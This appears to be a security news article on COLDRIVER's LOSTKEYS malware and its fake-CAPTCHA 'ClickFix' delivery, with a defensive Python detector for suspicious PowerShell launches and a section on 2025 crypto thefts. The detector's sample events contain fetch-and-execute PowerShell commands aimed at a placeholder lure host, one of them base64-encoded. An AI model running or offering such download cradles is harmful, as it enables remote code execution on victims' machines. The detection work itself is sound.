The Rising Threat of COLDRIVER: Unpacking the LOSTKEYS Malware

The landscape of cyber threats keeps evolving, with new actors emerging and established ones changing their tactics. A recent report from Google Threat Intelligence Group (GTIG) details the activities of a Russian government-backed threat group tracked as COLDRIVER, which is using a new malware family named LOSTKEYS against Western targets.

According to the report, COLDRIVER has historically relied on credential phishing; LOSTKEYS shows the group adding malware delivery to its toolkit, an escalation from harvesting passwords to taking control of the victim's machine. Installation is a multi-step chain that begins with a lure website displaying a fake CAPTCHA, which tricks the user into starting the infection themselves.

The fake CAPTCHA page does not exploit the browser. Instead it copies a PowerShell command to the user's clipboard and instructs the user to paste and run it from the Windows Run dialog, a social-engineering pattern widely known as "ClickFix". That command pulls down the next stages: an intermediate stage performs checks intended to detect analysis environments before it retrieves the final payload, and the chain ends with LOSTKEYS installed on the victim's machine. Because the user launches the command, the usual exploit-prevention controls never fire; the best detection opportunity is the unusual process tree and command line.
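As an added example (not code from Google's report or from this article), the following Python scores Sysmon-style process-creation events for the shape of a ClickFix launch: a shell started by explorer.exe, as happens when a command is pasted into the Run dialog, with a hidden window, a download cradle and in-memory execution, optionally hidden behind -EncodedCommand. The field names follow Sysmon Event ID 1; the sample events and their command lines are constructed for this example and are not indicators from the report, and the weights and the 4-point threshold are assumptions to be tuned per environment.

```python
"""Heuristic detection of ClickFix-style shell launches.

Hypothetical example: scores constructed Sysmon-style process-creation
events for a shell spawned from explorer.exe (the Run dialog) whose command
line hides its window, suppresses the profile, fetches a remote stage and
executes it in memory, possibly behind -EncodedCommand.
"""
import base64
import re

SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# (regex, weight, label): matched case-insensitively against the raw command
# line and, when present, against the decoded -EncodedCommand payload too.
PATTERNS = [
    (r"-w(?:indowstyle)?\s+hidden", 1, "hidden window"),
    (r"-nop(?:rofile)?\b", 1, "profile suppressed"),
    (r"-e(?:xecution)?p(?:olicy)?\s+bypass", 1, "execution policy bypass"),
    (r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
     r"downloadfile|net\.webclient)\b", 2, "download cradle"),
    (r"\b(?:iex|invoke-expression)\b", 1, "in-memory execution"),
    (r"https?://", 1, "URL in command line"),
]
ENCODED_RE = re.compile(
    r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def encode_for_powershell(script: str) -> str:
    """Base64 of UTF-16LE text, the format -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(evt: dict):
    """Return (score, reasons) for one process-creation event."""
    score, reasons = 0, []
    if (_basename(evt.get("ParentImage", "")) == "explorer.exe"
            and _basename(evt.get("Image", "")) in SHELL_IMAGES):
        score += 2
        reasons.append("shell spawned by explorer.exe (Run dialog / shell prompt)")
    cmd = evt.get("CommandLine", "")
    texts = [cmd]
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        score += 1
        reasons.append("encoded command: " + decoded[:60])
        texts.append(decoded)  # scan the decoded script with the same patterns
    for pattern, weight, label in PATTERNS:
        if any(re.search(pattern, t, re.IGNORECASE) for t in texts):
            score += weight
            reasons.append(label)
    return score, reasons


def flag_clickfix(events, threshold: int = 4):
    """Return [(index, score, reasons)] for events scoring at or above threshold."""
    hits = []
    for i, evt in enumerate(events):
        score, reasons = score_event(evt)
        if score >= threshold:
            hits.append((i, score, reasons))
    return hits


# Constructed sample events (Sysmon Event ID 1 fields). The command lines are
# illustrative only; they are not indicators from the GTIG report.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -nop -c "iwr http://lure.invalid/a -UseBasicParsing | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -ep bypass -enc " + encode_for_powershell(
         "IEX (New-Object Net.WebClient).DownloadString('http://lure.invalid/b')")},
    {"ParentImage": r"C:\Program Files\WindowsApps\WindowsTerminal.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": 'pwsh -NoLogo -c "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe"},
]

if __name__ == "__main__":
    for idx, score, reasons in flag_clickfix(SAMPLE_EVENTS):
        print(f"event {idx}: score {score}: {', '.join(reasons)}")
```

With these weights a user who simply opens cmd.exe from the Run dialog scores 2 and is not flagged, an admin running Get-Process from a terminal scores 0, and either of the constructed lure launches scores 8, including the one whose download cradle is only visible after decoding the -EncodedCommand argument.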

LOSTKEYS payload delivery. Source: Google

Once running, LOSTKEYS steals files matching a hard-coded list of extensions and directories and sends system information and a list of running processes back to COLDRIVER. The report lists the IP address 165.227.148[.]68 (defanged) among the infrastructure used in the chain; defenders should search proxy, firewall and DNS logs for it rather than rely on a single block.

In response, Google says it has added the malicious sites associated with LOSTKEYS to Safe Browsing, so Chrome and other browsers that consume the Safe Browsing list warn users before they reach the lure pages.

COLDRIVER's targets are mostly high-profile Western individuals, including former diplomats and journalists, so organisations in those circles need to track the group's shifting tradecraft. This is not its first move into malware: in January 2024 Google documented another COLDRIVER family, SPICA, a backdoor able to execute arbitrary shell commands and upload or download files.

The Bigger Picture: Crypto Hacks Reach Unprecedented Levels

This trend runs alongside another alarming development: a sharp rise in cryptocurrency hacks. As reported, losses attributed to crypto hacks reached about $2 billion in the first quarter of 2025 alone, which the report says exceeds the losses recorded in all of 2024.

The security firm Hacken notes that operational weaknesses and insufficient access controls remain the persistent problem for both centralized and decentralized players. Attackers increasingly rely on social engineering to abuse users' and operators' trust rather than on smart-contract bugs, and that shift accounts for much of this year's losses.

The single largest contributor was the roughly $1.5 billion theft from the cryptocurrency exchange Bybit in February, attributed to North Korea's Lazarus Group.

In conclusion, organisations in sensitive sectors need to stay vigilant and proactive. Whether the adversary is a state-backed group like COLDRIVER moving from phishing to malware, or financially motivated crews draining exchanges, the common thread is abuse of user trust, and defences have to adapt as quickly as the attackers do.
